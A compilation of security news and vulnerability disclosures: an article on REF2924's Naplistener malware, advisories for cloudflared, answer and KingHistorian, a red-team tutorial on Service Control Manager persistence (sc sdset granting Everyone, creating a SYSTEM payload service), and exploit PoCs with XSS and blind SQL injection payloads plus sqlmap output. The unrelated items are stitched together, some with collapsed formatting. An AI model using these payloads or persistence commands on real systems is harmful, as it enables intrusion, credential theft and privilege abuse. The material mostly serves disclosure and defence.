Threat actors are using legitimate network assets and open source code to fly under the radar in data-stealing attacks using a set of custom malware bent on evasion.

A group monitored as REF2924 by Elastic Security Labs is wielding novel data-stealing malware — an HTTP listener written in C# dubbed Naplistener by the researchers — in attacks against victims operating in southern and southeast Asia.

According to a blog post by Elastic senior security research engineer Remco Sprooten, in that region of the world, network-based detection and prevention technologies are the de facto method for securing many environments. But Naplistener — along with other new types of malware used by the group —appear "designed to evade network-based forms of detection," says Jake King, Elastic Security's director of engineering.

So, don't sleep on that defense-in-depth strategy.

Researchers observed Naplistener in the form of a new executable that was created and installed on a victim network as a Windows Service on Jan. 20. Threat actors created the executable, Wmdtc.exe, using a naming convention similar to the legitimate binary used by the Microsoft Distributed Transaction Coordinator service.

**A Focus on Detection Evasion**

Naplistener is the latest in a series of new types of custom malware that Elastic researchers have observed REF2924 using in its attacks that support a particular focus on evading network-based detection, King says. What these new malware families all have in common is not only that they are based on open source technologies but also that they use familiar and legitimate network assets to mask their activities.

"A consistent theme to all these capabilities is the intention to hide in legitimate and expected forms of network communication, and \[they\] are installed to resemble the underlying services they abuse," King notes.

While other threat groups also adopt these approaches with custom malware, they do so "less often, and less consistently" than REF2924, he notes, demonstrating that REF2924 is betting heavily on avoiding detection for success.

"A unique observation of this threat actor is in the deep focus of evasion tactics," King says. "While many threats masquerade in similar ways, this threat pursues the methodology to an extreme and consistently uses these methodologies."

**Custom Malware at a Glance**

In addition to Naplistener, which mimics the behavior of Web servers on a network to hide itself, REF2924 also is wielding custom malware that Elastic Security tracks as SiestaGraph and Somnirecord, among others. The former is notable for using Microsoft cloud resources for command and control to evade detection, and the latter masquerades as DNS protocol traffic, King says.

"Organizations in the observed regions of impact who rely strictly on network-based methods of detection will struggle to identify these malware families," he adds.

Specifically, Naplistener creates an HTTP request listener that can process incoming requests from the Internet, read any data that was submitted, decode it from Base64 format, and execute it in memory, the researchers said.

As mentioned, it evades victims' attempts at network-based detection by behaving similarly to Web servers, operating between legitimate Web users and resembling normal Web traffic. It does this all without generating Web server log events, the researchers said.

Naplistener also relies on code present in public repositories for a variety of purposes, and it appears that REF2924 may be developing additional prototypes and production-quality code from open sources, they added.

**Going Beyond Network-Level Detection**

Because REF2024 is so focused on avoiding network-based detection methods, enterprises in its crosshairs can avoid compromise by the group primarily by prioritizing endpoint-based detection technologies, more commonly known as endpoint detection and response (EDR), King says.

Indeed, while EDR is not a new security strategy for many organizations in the US, in the region of the world where the group is operating, it is still in early stages of adoption, he says. This exposes these organizations to risk from the custom malware that the group is deploying.

"Organizations which rely on network technologies to detect threats will face significant challenges, and those are compounded relative to the complexity of their networks," King says. "In short: The more connections and types of connections, the harder it is for organizations to monitor them effectively; this is relatively quickly addressed with another host-based form of visibility."

Another technology that organizations can deploy to combat malware that can evade network-based detection is egress filtering, or limiting the kinds of outbound network communications they permit, King says.

However, he adds, "this is not a particularly scalable approach once an organization reaches a significant size, due to the large number of egress points they manage and the diversity of legitimate communication methods."

Custom 'Naplistener' Malware a Nightmare for Network-Based Detection

A vulnerability has been discovered in cloudflared's installer (<= 2023.3.0) for Windows 32-bits devices that allows a local attacker with no administrative permissions to escalate their privileges on the affected device. This vulnerability exists because the MSI installer used by cloudflared relied on a world-writable directory. An attacker with local access to the device (without Administrator rights) can use symbolic links to trick the MSI installer into deleting files in locations that the attacker would otherwise have no access to. By creating a symlink from the world-writable directory to the target file, the attacker can manipulate the MSI installer's repair functionality to delete the target file during the repair process. Exploitation of this vulnerability could allow an attacker to delete important system files or replace them with malicious files, potentially leading to the affected device being compromised. The cloudflared client itself is not affected by this vulnerability, only the installer for 32-bit Windows devices.

**Impact**

A vulnerability has been discovered in cloudflared's installer (<= 2023.3.0) for Windows 32-bits devices that allows a local attacker with no administrative permissions to escalate their privileges on the affected device. This vulnerability exists because the MSI installer used by cloudflared relied on a world-writable directory.

An attacker with local access to the device (without Administrator rights) can use symbolic links to trick the MSI installer into deleting files in locations that the attacker would otherwise have no access to. By creating a symlink from the world-writable directory to the target file, the attacker can manipulate the MSI installer's repair functionality to delete the target file during the repair process.

Exploitation of this vulnerability could allow an attacker to delete important system files or replace them with malicious files, potentially leading to the affected device being compromised.

**The cloudflared client itself is not affected by this vulnerability, only the installer for 32-bit Windows devices.**

**Patches**

A new installer was released as part of version 2023.3.1. Users are encouraged to remove old installers from their systems.

**References**

Cloudflared Releases

CVE-2023-1314: Local Privilege Escalation Vulnerability in cloudflared's Installer

Observable Response Discrepancy in GitHub repository answerdev/answer prior to 1.0.6.

**Description**

The password reset functionality leaks information pertaining to use accounts. Where an invalid account is utilized, the application responds that the account could not be found. Where an account is valid, the application responds with a reason "base.success" (when intercepted), or that if an account with that name is identified it will receive an email (browser response).

**Proof of Concept**

    POST /answer/api/v1/user/password/reset HTTP/1.1
    Host: 192.168.1.66:9080
    Content-Length: 90
    Accept-Language: en_US
    Authorization: 
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@qmg10q7skchmypqtyu1x6l92styvxslh.oastify.com
    Content-Type: application/json
    Accept: */*
    Origin: http://192.168.1.66:9080
    Referer: http://egypue1ge0basdkhsivl093qmhsjref3.oastify.com/ref
    Accept-Encoding: gzip, deflate
    Connection: close
    Cache-Control: no-transform
    
    {"e_mail":"testemail@email.com","captcha_code":"4a2u","captcha_id":"EmC1gF0NkgvUvCdHAu7z"}
    

**Impact**

An attacker can identify valid user email accounts which permits the attacker to increase the application's attack surface.

**Occurrences**

CVE-2023-1540: Observable Response Discrepancy in Password Reset Functionality in answer

An information disclosure vulnerability exists in the User authentication functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a disclosure of sensitive information. An attacker can sniff network traffic to leverage this vulnerability.

**SUMMARY**

An information disclosure vulnerability exists in the User authentication functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a disclosure of sensitive information. An attacker can sniff network traffic to leverage this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WellinTech KingHistorian 35.01.00.05

**PRODUCT URLS**

KingHistorian - https://www.wellintech.com/product/kinghistorian

**CVSSv3 SCORE**

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-200 - Information Exposure

**DETAILS**

KingHistorian is a time-series database used for ingesting and analyzing industrial control system data. KingHistorian is designed to be high performance and highly reliable for process data.

The protocol used to communicate with XDBServer uses a mixture of ciphering and compression, which prevents plaintext strings from being sent directly. However, if an attacker captured an authentication packet, all the necessary information is included in the packet to recover the username and password.

Packets contain a 0x14-byte header starting with ‘SORB’ in ASCII as magic bytes. The rest of this header is uninteresting for this attack. Once the 0x14 bytes are skipped over, the packet’s first byte of data contains a flag to display if it is compressed, with the least-significant bit of the first byte representing the compression flag. If the packet is compressed, it is decompressed with quicklz . Once decompressed, the data can be recovered using length and value encoding to recover a structure as follows:

    pub struct BrkConnectionOption {
        username: String,
        ciphered_password: String,
        application_name: String,
        client_name: String,
        callback_proxy: String,
        collector_name: String,
        network_timeout: i32,
        connection_flags: i32,
        reserved_1: i32,
        reserved_2: i32,
        session_id: String,
        reserved_4: String,
        enc_key_1: i32,
        enc_key_2: i32,
        enc_key_3: i32,
        enc_key_4: i32,
        os_version: String,
        protocol_version: i32,
        system_general_1: i32,
        system_general_2: i32,
        system_general_3: i32,
        system_general_4: i32, 
    }
    

By combining the parts of the enc_key, it is possible to decipher the ciphered_password from the packet back into the plaintext form.

**Exploit Proof of Concept**

    Raw packet data : [83, 79, 82, 66, 2, 1, 70, 1, 19, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 82, 0, 0, 0, 0, 0, 71, 247, 1, 0, 0, 92, 2, 0, 0, 0, 0, 0, 128, 0, 86, 0, 0, 0, 8, 75, 0, 82, 0, 84, 0, 68, 0, 66, 0, 65, 0, 80, 0, 73, 0, 16, 66, 0, 114, 0, 107, 0, 83, 0, 10, 8, 130, 128, 101, 113, 32, 118, 99, 80, 67, 0, 111, 0, 110, 0, 110, 97, 80, 99, 0, 116, 0, 7, 226, 99, 119, 0, 85, 0, 115, 97, 80, 114, 0, 80, 50, 0, 55, 0, 4, 64, 85, 145, 53, 0, 34, 52, 48, 0, 48, 0, 57, 0, 54, 0, 49, 0, 56, 65, 32, 51, 49, 144, 49, 65, 16, 69, 49, 128, 67, 49, 96, 65, 49, 96, 51, 0, 67, 49, 128, 68, 0, 130, 85, 181, 210, 51, 65, 32, 54, 0, 52, 0, 70, 65, 48, 50, 60, 70, 65, 32, 57, 65, 48, 65, 49, 16, 57, 49, 112, 57, 49, 0, 56, 49, 48, 82, 60, 55, 49, 96, 68, 65, 96, 51, 0, 82, 60, 51, 51, 0, 106, 85, 75, 197, 48, 65, 96, 50, 65, 80, 54, 65, 16, 130, 65, 68, 65, 16, 66, 65, 64, 67, 49, 0, 49, 49, 96, 52, 49, 80, 34, 64, 55, 65, 64, 15, 75, 65, 64, 66, 81, 48, 121, 113, 48, 77, 0, 103, 113, 64, 130, 84, 69, 145, 83, 113, 64, 117, 0, 100, 0, 105, 97, 240, 11, 77, 81, 48, 69, 65, 64, 71, 65, 80, 87, 65, 144, 78, 49, 16, 48, 0, 78, 184, 86, 67, 65, 32, 75, 0, 45, 49, 64, 98, 0, 170, 90, 85, 145, 102, 49, 96, 53, 49, 96, 98, 49, 16, 45, 49, 80, 48, 97, 64, 97, 35, 208, 50, 58, 51, 33, 208, 97, 49, 64, 49, 49, 32, 45, 97, 64, 98, 49, 144, 54, 49, 32, 97, 0, 97, 49, 112, 54, 0, 40, 168, 168, 234, 99, 0, 98, 49, 128, 58, 113, 64, 99, 0, 112, 0, 32, 33, 208, 104, 33, 0, 49, 49, 144, 50, 0, 46, 49, 16, 54, 49, 128, 46, 49, 0, 46, 49, 112, 49, 33, 0, 45, 115, 0, 82, 53, 214, 6, 0, 160, 55, 49, 144, 2, 47, 116, 33, 0, 48, 1, 0, 1, 0, 2, 1, 0, 8, 0, 46, 1, 79, 64, 6, 0, 58, 92, 90, 127, 4, 12, 117, 19, 28, 39, 51, 77, 97, 144, 99, 69, 20, 85, 237, 113, 32, 111, 113, 48, 111, 0, 102, 113, 64, 32, 0, 87, 97, 144, 110, 97, 64, 111, 0, 119, 113, 48, 32, 81, 80, 110, 97, 176, 110, 97, 240, 119, 97, 224, 32, 65, 80, 66, 111, 116, 97, 144, 242, 104, 160, 170, 2, 134, 44, 0, 32, 0, 40, 49, 96, 46, 49, 96, 32, 97, 32, 117, 97, 144, 108, 97, 64, 32, 49, 144, 50, 49, 0, 48, 0, 41, 0, 0, 80, 3, 8, 0, 5, 0, 0, 0, 0, 0]
    
    BrkConnectionOption {
        username: "newUser",
        ciphered_password: "27527009618B391AE8C6A63C8D3B64FCC8FB9CA1979083E876DF3E83080F2E6A8BDABDC01645BD7D",
        application_name: "KDBSysMgtStudio",
        client_name: "MSEDGEWIN10",
        callback_proxy: "KRTDBCBK-4bf656b1-50da-4393-a412-db962aa76cb8:tcp -h 192.168.0.71 -p 5679 -t 0",
        collector_name: "",
        network_timeout: 0,
        connection_flags: 2,
        reserved_1: 0,
        reserved_2: 0,
        session_id: "",
        reserved_4: "",
        enc_key_1: 1078919470,
        enc_key_2: 1547304966,
        enc_key_3: 201621338,
        enc_key_4: 656151413,
        os_version: "Microsoft Windows Unknown Edition, (6.6 build 9200)",
        protocol_version: 217088,
        system_general_1: 0,
        system_general_2: 0,
        system_general_3: 0,
        system_general_4: 0,
        encryption_key: EncryptionKey {
            enc_1: 1078919470,
            enc_2: 1547304966,
            enc_3: 201621338,
            enc_4: 656151413,
        },
    }
    
    Password is : Thisismypassword
    

**TIMELINE**

2022-12-16 - Initial Vendor Contact  
2022-12-22 - Vendor Disclosure  
2022-12-22 - Initial Vendor Contact  
2023-03-17 - Vendor Patch Release  
2023-03-20 - Public Release

Discovered by Carl Hurd of Cisco Talos.

CVE-2022-45124: TALOS-2022-1683 || Cisco Talos Intelligence Group

The service control manager (SCM) is responsible to start and stop services in windows environments including device drivers and start up applications. Microsoft introduced in… 
Continue reading → Persistence – Service Control Manager

The service control manager (SCM) is responsible to start and stop services in windows environments including device drivers and start up applications. Microsoft introduced in Windows 2000 and later the Security Descriptor Definition Language (SDDL) in order to provide a textual representation for security descriptors in a more readable format. Prior to Windows 2000 security descriptors were represented as hex bytes. Permissions of the service control manager like other windows objects are managed by Discretionary Access Control List (DACL) which are also represent by SDDL.

During red team operations if elevated access has been achieved the permissions of the service control manager can be modified via the SDDL in order to grant the “Everyone” group with rights over the service control manager. This action could be used as a form of persistence since any user could create a service on the environment that will execute an arbitrary command or payload with SYSTEM level privileges every time that the computer starts. The technique was discovered by Grzegorz Tworek and was shared over Twitter.

Execution of the command below will retrieve quickly the SDDL rights of the service control manager utility.

    sc sdshow scmanager

Service Control Manager – Security Descriptor

PowerShell could also be used to enumerate SDDL rights for all the user groups and convert them to a readable format.

$SD = Get-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\Schedule\\Security\\
$sddl = (\[wmiclass\]”Win32\_SecurityDescriptorHelper”).BinarySDToSDDL($SD.Security).Sddl
$SecurityDescriptor = ConvertFrom-SddlString -Sddl $sddl
$SecurityDescriptor.DiscretionaryAcl

Enumerate Permissions via PowerShell

The command below will enumerate the permissions of the “_scmanager_” utility and will display the associated SDDL rights.

    sc sdshow scmanager showrights

Service Control Manager – Rights Enumeration

Users with standard level access they cannot create a service in Windows environments. This privilege belongs only to elevated users such as Local Administrators. However, modification of the security descriptor permissions for the service control manager could allow also any user to create a service that will run under the context of the SYSTEM account. Using the security descriptor definition language these permissions could be modified by executing the command below:

    sc.exe sdset scmanager D:(A;;KA;;;WD)

Security Descriptor Permission Modification

The following table displays what the SDDL acronyms mean in the above command.

D

Discretionary Access Control List

A

Access Control Entry – Access Allowed

KA

KEY\_ALL\_ACCESS – Rights

WD

Security Principal of Everyone Group

The service configuration utility could be used to create a new service. The “_binPath_” parameter could store the arbitrary payload which will executed once the service starts. It should be noted that since the permissions of the service control manager changed, non elevated users can also create new services on the windows environment. In the event that the malicious service is removed by the blue team permissions will still remain allowing standard users to continue create new services to maintain persistence.

    sc create pentestlab displayName= "pentestlab" binPath= "C:\temp\pentestlab.exe" start= auto

Service Control Manager – New Service from Standard User Account

The new service will appear in the list of Windows services.

Service Control Manager – New Service

When the system starts again, the service will automatically initiate and the payload will executed with SYSTEM level privileges.

Service Control Manager – Meterpreter

**Post navigation**

Persistence – Service Control Manager

MyBB External Redirect Warning plugin version 1.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: MyBB External Redirect Warning Plugin 1.3 – Cross-Site Scripting# Date: February 1, 2021# Author: 0xB9# Twitter: @0xB9sec# Software Link: https://community.mybb.com/mods.php?action=view&pid=493# Version: 1.3# Tested On: Windows 10# CVE: CVE-2022-28353Description:This plugin notifies the user when they are being redirect to an off-site page. The redirect URL is vulnerable to XSS.Proof of Concept:– Go to the following URL… external.php?url=javascript:alert(1);– Click continuePayload will execute

MyBB External Redirect Warning 1.3 Cross Site Scripting

MyBB Active Threads plugin version 1.3.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: MyBB Active Threads Plugin 1.3.0 – Cross-Site Scripting# Date: February 9, 2022# Author: 0xB9# Twitter: @0xB9sec# Software Link: https://community.mybb.com/mods.php?action=view&pid=1336# Version: 1.3.0# Tested On: Windows 10# CVE: CVE-2022-28354Description:This plugin shows a page of active threads. The date parameter is vulnerable to XSS when setting a time period.Proof of Concept:activethreads.php?days=7&hours=0&mins=0&date=”><script>alert(1)</script>

MyBB Active Threads 1.3.0 Cross Site Scripting

101+ News Portal version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: 101+ News Portal - SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the page (/101news/search.php) in 101+ News Portal allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "searchtitle" parameter. ## Request PoC```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'```This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "searchtitle" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'%2b(select*from(select(sleep(20)))a)%2b'```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/multi]└─# sqlmap -r sqli.txt -p 'searchtitle' --batch --dbs --level=3 --risk=2                                           ---snip---POST parameter 'searchtitle' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 114 HTTP(s) requests:---Parameter: searchtitle (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: searchtitle=232943' AND 3793=(SELECT (CASE WHEN (3793=3793) THEN 3793 ELSE (SELECT 6168 UNION SELECT 2808) END))-- KdPX    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: searchtitle=232943' AND (SELECT 1460 FROM (SELECT(SLEEP(5)))dqHc)-- zMGY    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: searchtitle=232943' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787071,0x457444695056617478516b4b4f666e73744162466478444e5061624161514f78726c727777764c6b,0x716a6b6271)-- ----[18:01:02] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[18:01:02] [INFO] fetching database namesavailable databases [5]:[*] information_schema[*] mysql[*] newsportal[*] performance_schema[*] phpmyadmin---snip---```

101+ News Portal 1.0 SQL Injection

Music Gallery Site version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Music Gallery Site - Cross Site Scripting Vulnerability (Authenticated)# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-music.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Online Pizza Ordering System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-music/admin/?page=musics63401'%3balert(1)%2f%2f399 HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-music/admin/Cookie: PHPSESSID=05o776i4lcn4nm1h48he29gd9b```

Tag

#windows